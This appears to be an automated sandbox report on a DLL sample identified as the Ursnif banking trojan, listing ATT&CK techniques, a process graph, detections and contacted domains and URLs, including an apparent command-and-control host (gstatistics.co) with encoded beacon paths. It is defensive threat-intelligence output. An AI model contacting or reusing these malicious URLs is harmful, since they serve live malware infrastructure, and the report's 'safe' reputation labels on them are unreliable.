            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 332237 Sample: p1cture3.dll Startdate: 18/12/2020 Architecture: WINDOWS Score: 68 25 gstatistics.co 2->25 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected  Ursnif 2->37 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 regsvr32.exe 8 9->11         started        14 cmd.exe 1 9->14         started        signatures6 39 Writes or reads registry keys via WMI 11->39 41 Writes registry values via WMI 11->41 43 Creates a COM Internet Explorer object 11->43 16 iexplore.exe 2 74 14->16         started        process7 process8 18 iexplore.exe 5 142 16->18         started        21 iexplore.exe 25 16->21         started        23 iexplore.exe 29 16->23         started        dnsIp9 27 www.msn.com 18->27 29 web.vortex.data.msn.com 18->29 33 5 other IPs or domains 18->33 31 ocsp.sca1b.amazontrust.com 65.9.70.182, 49759, 49760, 80 AMAZON-02US United States 21->31

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            p1cture3.dll20%VirustotalBrowse
            p1cture3.dll19%ReversingLabsWin32.Trojan.Wacatac

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.regsvr32.exe.df0000.4.unpack100%AviraHEUR/AGEN.1108168Download File
            1.2.regsvr32.exe.a80000.1.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

            Domains

            SourceDetectionScannerLabelLink
            ocsp.sca1b.amazontrust.com0%VirustotalBrowse
            gstatistics.co0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://www.remixd.com/privacy_policy.html0%URL Reputationsafe
            https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
            http://gstatistics.co/images/GoexDOefGezKVL0h1dQfW/P8ihkSPhjIn_2Buh/vqH_2F_2BqoQIE1/Bq8bHihrQ4ihYZlN0%Avira URL Cloudsafe
            http://ocsp.sca1b.amazontrust.com/images/jhYAn3wKHkyVTfw0/00VSw8f6pL0WGBk/m4PqAGyanFhkbyBOYl/qp5aS987V/V_2F_2BDl1vlB4fNYU_2/F2MBpXT1koABcUI5eof/xLEdBGKD7jA0v_2Fz7BWKv/3L_2BuB2pgeH4/HkdTjRHb/hcfpV3qoBZMqxjVhpVXAZkF/kYfRQAAcy4/xtA2JR23ptN8RGY98/Uvv3IGmm/Pvn0.avi0%Avira URL Cloudsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://bealion.com/politica-de-cookies0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://www.gadsme.com/privacy-policy/0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://portal.eu.numbereight.me/policies-license#software-privacy-notice0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://channelpilot.co.uk/privacy-policy0%URL Reputationsafe
            https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://www.admo.tv/en/privacy-policy0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://listonic.com/privacy/0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://quantyoo.de/datenschutz0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe
            https://related.hu/adatkezeles/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            contextual.media.net
            23.54.113.52
            truefalse
              high
              ocsp.sca1b.amazontrust.com
              65.9.70.182
              truefalseunknown
              gstatistics.co
              95.181.198.158
              truefalseunknown
              hblg.media.net
              23.54.113.52
              truefalse
                high
                lg3.media.net
                23.54.113.52
                truefalse
                  high
                  web.vortex.data.msn.com
                  unknown
                  unknownfalse
                    high
                    www.msn.com
                    unknown
                    unknownfalse
                      high
                      srtb.msn.com
                      unknown
                      unknownfalse
                        high
                        cvision.media.net
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://ocsp.sca1b.amazontrust.com/images/jhYAn3wKHkyVTfw0/00VSw8f6pL0WGBk/m4PqAGyanFhkbyBOYl/qp5aS987V/V_2F_2BDl1vlB4fNYU_2/F2MBpXT1koABcUI5eof/xLEdBGKD7jA0v_2Fz7BWKv/3L_2BuB2pgeH4/HkdTjRHb/hcfpV3qoBZMqxjVhpVXAZkF/kYfRQAAcy4/xtA2JR23ptN8RGY98/Uvv3IGmm/Pvn0.avifalse
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://searchads.msn.net/.cfm?&&kp=1&{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                            high
                            https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.4.drfalse
                              high
                              https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.4.drfalse
                                high
                                https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=dech-edge&amp;ued=htde-ch[1].htm.4.drfalse
                                  high
                                  https://www.remixd.com/privacy_policy.htmliab2Data[1].json.4.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://onedrive.live.com;Fotos85-0f8009-68ddb2ab[1].js.4.drfalse
                                  • Avira URL Cloud: safe
                                  low
                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.4.drfalse
                                    high
                                    https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel85-0f8009-68ddb2ab[1].js.4.drfalse
                                      high
                                      http://ogp.me/ns/fb#de-ch[1].htm.4.drfalse
                                        high
                                        http://gstatistics.co/images/GoexDOefGezKVL0h1dQfW/P8ihkSPhjIn_2Buh/vqH_2F_2BqoQIE1/Bq8bHihrQ4ihYZlN~DFFBA25DDF25B6D254.TMP.3.dr, {9F198FF5-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://outlook.live.com/mail/deeplink/compose;Kalender85-0f8009-68ddb2ab[1].js.4.drfalse
                                          high
                                          https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                            high
                                            https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.4.drfalse
                                              high
                                              https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn85-0f8009-68ddb2ab[1].js.4.drfalse
                                                high
                                                https://web.vortex.data.msn.com/collect/v1de-ch[1].htm.4.drfalse
                                                  high
                                                  https://www.office.com/?omkt=de-ch%26WT.mc_id=MSN_sitede-ch[1].htm.4.drfalse
                                                    high
                                                    https://www.skype.com/de-ch[1].htm.4.drfalse
                                                      high
                                                      https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.4.drfalse
                                                        high
                                                        https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.4.drfalse
                                                          high
                                                          https://onedrive.live.com/?qt=allmyphotos;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                            high
                                                            https://www.msn.com/de-ch/news/other/besonders-erstsemestrige-f%c3%bchlen-sich-einsam-und-isoliert/ade-ch[1].htm.4.drfalse
                                                              high
                                                              https://amzn.to/2TTxhNgde-ch[1].htm.4.drfalse
                                                                high
                                                                https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                  high
                                                                  https://client-s.gateway.messenger.live.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                    high
                                                                    https://www.brightcom.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                      high
                                                                      https://www.msn.com/de-ch/de-ch[1].htm.4.drfalse
                                                                        high
                                                                        https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                          high
                                                                          https://www.msn.com/de-ch/sport/fussball/fcz-frauen-beissen-sich-die-z%c3%a4hne-aus/ar-BB1c1dBl?ocidde-ch[1].htm.4.drfalse
                                                                            high
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                                                              high
                                                                              https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.4.drfalse
                                                                                high
                                                                                https://bealion.com/politica-de-cookiesiab2Data[1].json.4.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://www.msn.com/de-chde-ch[1].htm.4.drfalse
                                                                                  high
                                                                                  https://twitter.com/i/notifications;Ich85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                    high
                                                                                    https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.4.drfalse
                                                                                      high
                                                                                      https://www.gadsme.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=dech-shoppingstride-ch[1].htm.4.drfalse
                                                                                        high
                                                                                        https://portal.eu.numbereight.me/policies-license#software-privacy-noticeiab2Data[1].json.4.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                          high
                                                                                          https://www.msn.com/de-ch/news/other/junge-is-r%c3%bcckkehrerin-wehrt-sich-erfolgreich-gegen-urteil/de-ch[1].htm.4.drfalse
                                                                                            high
                                                                                            https://www.msn.com/de-ch/news/other/konkursverfahren-%c3%bcber-rolf-erb-nach-16-jahren-abgeschlossede-ch[1].htm.4.drfalse
                                                                                              high
                                                                                              https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                high
                                                                                                https://www.msn.com/de-ch/news/other/banker-stellt-karton-zu-fr%c3%bch-raus-und-muss-nun-500-fr-zahlde-ch[1].htm.4.drfalse
                                                                                                  high
                                                                                                  https://www.msn.com/de-ch/news/other/blerim-dzemaili-kehrt-zum-fc-z%c3%bcrich-zur%c3%bcck/ar-BB1c2bgde-ch[1].htm.4.drfalse
                                                                                                    high
                                                                                                    https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.4.drfalse
                                                                                                      high
                                                                                                      http://ogp.me/ns#de-ch[1].htm.4.drfalse
                                                                                                        high
                                                                                                        https://docs.prebid.org/privacy.htmliab2Data[1].json.4.drfalse
                                                                                                          high
                                                                                                          https://onedrive.live.com/?qt=mru;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                            high
                                                                                                            https://www.skype.com/de85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                              high
                                                                                                              https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.4.drfalse
                                                                                                                high
                                                                                                                https://www.skype.com/de/download-skype85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                  high
                                                                                                                  https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downliab2Data[1].json.4.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://clkde.tradedoubler.com/click?p=235514&amp;a=3064090&amp;g=24888006&amp;epi=dech-shoppingstride-ch[1].htm.4.drfalse
                                                                                                                    high
                                                                                                                    https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.4.drfalse
                                                                                                                      high
                                                                                                                      http://www.hotmail.msn.com/pii/ReadOutlookEmail/85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                        high
                                                                                                                        https://channelpilot.co.uk/privacy-policyiab2Data[1].json.4.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://onedrive.live.com;OneDrive-App85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        low
                                                                                                                        https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                          high
                                                                                                                          https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=185-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/de-ch/news/other/regierung-genehmigt-27-millionen-f%c3%bcr-n%c3%a4chste-glattalbde-ch[1].htm.4.drfalse
                                                                                                                              high
                                                                                                                              https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                high
                                                                                                                                https://www.admo.tv/en/privacy-policyiab2Data[1].json.4.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPathiab2Data[1].json.4.drfalse
                                                                                                                                  high
                                                                                                                                  https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                                    high
                                                                                                                                    https://outlook.com/de-ch[1].htm.4.drfalse
                                                                                                                                      high
                                                                                                                                      https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862de-ch[1].htm.4.drfalse
                                                                                                                                        high
                                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.4.drfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drfalse
                                                                                                                                                high
                                                                                                                                                https://onedrive.live.com/?qt=mru;Aktuelle85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com/de-ch/?ocid=iehp{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.4.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/de-ch/news/other/rund-100-000-betreibungen-leiten-die-krankenkassen-im-kanton-z%de-ch[1].htm.4.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.4.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.msn.com/de-ch/news/other/rolf-erbs-gl%c3%a4ubiger-erhalten-hohe-erl%c3%b6se/ar-BB1c2kH2?de-ch[1].htm.4.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.4.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.4.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.bidstack.com/privacy-policy/iab2Data[1].json.4.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://onedrive.live.com/about/en/download/85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://listonic.com/privacy/iab2Data[1].json.4.drfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.4.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://twitter.com/de-ch[1].htm.4.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://quantyoo.de/datenschutziab2Data[1].json.4.drfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://outlook.live.com/calendar85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://onedrive.live.com/#qt=mru85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.4.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdfiab2Data[1].json.4.drfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://support.skype.com85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.4.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1{3013182F-417E-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.4.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.4.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utmde-ch[1].htm.4.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://related.hu/adatkezeles/iab2Data[1].json.4.drfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://login.skype.com/login/oauth/microsoft?client_id=73813385-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header85-0f8009-68ddb2ab[1].js.4.drfalse
                                                                                                                                                                                          high

                                                                                                                                                                                          Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          65.9.70.182
                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                          16509AMAZON-02USfalse

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                                                          Analysis ID:332237
                                                                                                                                                                                          Start date:18.12.2020
                                                                                                                                                                                          Start time:14:12:12
                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 7m 20s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Sample file name:p1cture3.dll
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                          Number of analysed new started processes analysed:40
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal68.bank.troj.winDLL@14/118@9/1
                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                          • Successful, ratio: 85.7% (good quality ratio 82.8%)
                                                                                                                                                                                          • Quality average: 80%
                                                                                                                                                                                          • Quality standard deviation: 27.5%
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 71%
                                                                                                                                                                                          • Number of executed functions: 35
                                                                                                                                                                                          • Number of non-executed functions: 38
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Adjust boot time
                                                                                                                                                                                          • Enable AMSI
                                                                                                                                                                                          • Found application associated with file extension: .dll
                                                                                                                                                                                          Warnings:
                                                                                                                                                                                          Show All
                                                                                                                                                                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 104.83.120.32, 204.79.197.203, 204.79.197.200, 13.107.21.200, 23.10.249.18, 23.10.249.32, 65.55.44.109, 23.54.113.52, 51.104.146.109, 23.10.249.26, 23.10.249.43, 23.54.113.104, 152.199.19.161, 20.54.26.129, 205.185.216.42, 205.185.216.10, 51.11.168.160, 51.104.139.180, 52.155.217.156
                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, global.vortex.data.trafficmanager.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, cs9.wpc.v0cdn.net
                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                                                          Simulations

                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                          No simulations

                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                          IPs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                          65.9.70.182statis1c.dllGet hashmaliciousBrowse

                                                                                                                                                                                            Domains

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                            contextual.media.netp1cture3jpg.dllGet hashmaliciousBrowse
                                                                                                                                                                                            • 23.54.113.52
                                                                                                                                                                                            ya.wav.dllGet hashmaliciousBrowse
                                                                                                                                                                                            • 2.18.68.31
                                                                                                                                                                                            ar.dllGet hashmaliciousBrowse
                                                                                                                                                                                            • 92.122.146.68
                                                                                                                                                                                            ya.wav.dllGet hashmaliciousBrowse
                                                                                                                                                                                            • 104.80.28.24
